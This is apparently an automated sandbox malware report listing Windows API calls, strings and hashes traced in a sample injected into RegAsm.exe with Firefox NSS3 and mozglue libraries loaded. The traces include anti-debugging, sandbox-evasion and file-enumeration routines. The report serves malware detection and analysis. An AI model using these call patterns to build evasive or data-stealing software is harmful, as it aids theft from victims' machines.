                                                                                                        • Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C288FEE
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2890DC
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C289118
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C28915C
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C2891C2
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C289209
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: 3333$UUUU
                                                                                                        • API String ID: 1967222509-2679824526
                                                                                                        • Opcode ID: 6e29bd764c42582b7baa989fcc547e362c3cd932d7b0a9e35e69937378dde2b0
                                                                                                        • Instruction ID: b319bb9951c6781b220dbc9adfa6851f85c3566ed07d89ddf852cc4c9f6d935f
                                                                                                        • Opcode Fuzzy Hash: 6e29bd764c42582b7baa989fcc547e362c3cd932d7b0a9e35e69937378dde2b0
                                                                                                        • Instruction Fuzzy Hash: 17A19F72E001199FDB04DB69CC81BDEB7B5BF48328F094129ED15A7781EB36AC15CBA1
                                                                                                        APIs
                                                                                                        • PR_CallOnce.NSS3(6C3114E4,6C27CC70), ref: 6C2C8D47
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C8D98
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C2C8E7B
                                                                                                        • htons.WSOCK32(?), ref: 6C2C8EDB
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C8F99
                                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C2C910A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                        • String ID: %u.%u.%u.%u
                                                                                                        • API String ID: 1845059423-1542503432
                                                                                                        • Opcode ID: 16dcb51c7b0c704920b9e42b3b29ebf8862ffba3005ccb044dc53a4c0d914289
                                                                                                        • Instruction ID: f3966d27fafc8dfaa147aed45b80910742d424ce23be33a0cc05c7685b81f453
                                                                                                        • Opcode Fuzzy Hash: 16dcb51c7b0c704920b9e42b3b29ebf8862ffba3005ccb044dc53a4c0d914289
                                                                                                        • Instruction Fuzzy Hash: 2002B931B0525A8FDB18CB1DC4697AABBA2EF42308F19C35AEC915BA91C371D905C7D2
                                                                                                        APIs
                                                                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C0E2C31
                                                                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C0E2C61
                                                                                                          • Part of subcall function 6C094DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C094E5A
                                                                                                          • Part of subcall function 6C094DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C094E97
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0E2C82
                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0E2E2D
                                                                                                          • Part of subcall function 6C0A81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0A81DE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                        • API String ID: 801438305-4149320968
                                                                                                        • Opcode ID: e657552ce858fc11b82705710fbd553fc8e70aec06383167abf50436b349e0ab
                                                                                                        • Instruction ID: 7a69e0bc1ad8d36359c6b83704eb54f836f50034368b2ddd2d37825e3ca809fe
                                                                                                        • Opcode Fuzzy Hash: e657552ce858fc11b82705710fbd553fc8e70aec06383167abf50436b349e0ab
                                                                                                        • Instruction Fuzzy Hash: 4C91DE706483818FC724CF24C48579EBBE0AFC9358F10892DE59A9BB61DB30E949CB43
                                                                                                        APIs
                                                                                                        • PR_GetIdentitiesLayer.NSS3 ref: 6C2468FC
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C246924
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790AB
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790C9
                                                                                                          • Part of subcall function 6C279090: EnterCriticalSection.KERNEL32 ref: 6C2790E5
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C279116
                                                                                                          • Part of subcall function 6C279090: LeaveCriticalSection.KERNEL32 ref: 6C27913F
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07AD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07CD
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C13204A), ref: 6C1A07D6
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C13204A), ref: 6C1A07E4
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,6C13204A), ref: 6C1A0864
                                                                                                          • Part of subcall function 6C1A07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C1A0880
                                                                                                          • Part of subcall function 6C1A07A0: TlsSetValue.KERNEL32(00000000,?,?,6C13204A), ref: 6C1A08CB
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08D7
                                                                                                          • Part of subcall function 6C1A07A0: TlsGetValue.KERNEL32(?,?,6C13204A), ref: 6C1A08FB
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C24693E
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C246977
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C2469B8
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C246B1E
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C246B39
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C246B62
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                        • String ID:
                                                                                                        • API String ID: 4003455268-0
                                                                                                        • Opcode ID: 1dcbc5f4e124f1828d6813ff9525a56848807dc231ada6033e2ed1fec02296a4
                                                                                                        • Instruction ID: 6748bf6e9b8858629c595f2b55b4fc0dad8352274fa3171d7c52e9fa659288ca
                                                                                                        • Opcode Fuzzy Hash: 1dcbc5f4e124f1828d6813ff9525a56848807dc231ada6033e2ed1fec02296a4
                                                                                                        • Instruction Fuzzy Hash: E7915D74668208CFDB58DF2DC4C095E7BA2FB87304B61C259DC84EBA19D771D982CB92
                                                                                                        APIs
                                                                                                        • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 0040182A
                                                                                                        • GetCursorPos.USER32(?), ref: 0040183A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040184A
                                                                                                        • GetCursorPos.USER32(?), ref: 00401859
                                                                                                        • Sleep.KERNEL32(00002710), ref: 0040186B
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00401870
                                                                                                        • GetCursorPos.USER32(?), ref: 0040187F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 3283940658-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
                                                                                                        • StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
                                                                                                        • StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
                                                                                                        • FindClose.KERNEL32(?), ref: 0040BF05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 2390431556-1173974218
                                                                                                        APIs
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C108A4B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ~ql
                                                                                                        • API String ID: 2221118986-1783733486
                                                                                                        APIs
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C1088F0
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C10925C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ~ql
                                                                                                        • API String ID: 2221118986-1783733486
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
                                                                                                        • GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        APIs
                                                                                                        • CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                        • LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                        • String ID: $g@
                                                                                                        • API String ID: 4291131564-2623900638
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0041D44E
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
                                                                                                        • UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041D491
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CD086
                                                                                                        • PR_Malloc.NSS3(00000001), ref: 6C2CD0B9
                                                                                                        • PR_Free.NSS3(?), ref: 6C2CD138
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeMallocstrlen
                                                                                                        • String ID: >
                                                                                                        • API String ID: 1782319670-325317158
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C221052
                                                                                                        • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C221086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: h("l$h("l
                                                                                                        • API String ID: 1297977491-319718214
                                                                                                        APIs
                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871034439-0
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C
                                                                                                          • Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942
                                                                                                          • Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 568878067-0
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000), ref: 00401474
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentInformationQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 3953534283-0
                                                                                                        APIs
                                                                                                        • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2099609381-0
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3550a8de41428d27622b2a166725bb1b0b94578aa7879d7fa9394c4ff600cad5
                                                                                                        • Instruction ID: 4e84fb2eb1de02006c4565d81d0ec7dd13af437e54a09632c8f484b1ef8e3e48
                                                                                                        • Opcode Fuzzy Hash: 3550a8de41428d27622b2a166725bb1b0b94578aa7879d7fa9394c4ff600cad5
                                                                                                        • Instruction Fuzzy Hash: 3F11B276B012958FE704CF55D88479AB7B5BF4631CF0442AAD8058FA41D775D887C7C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 63323ee303d310e3bf9fc7729428787ce618392a0717bc4cb55730e8021873ff
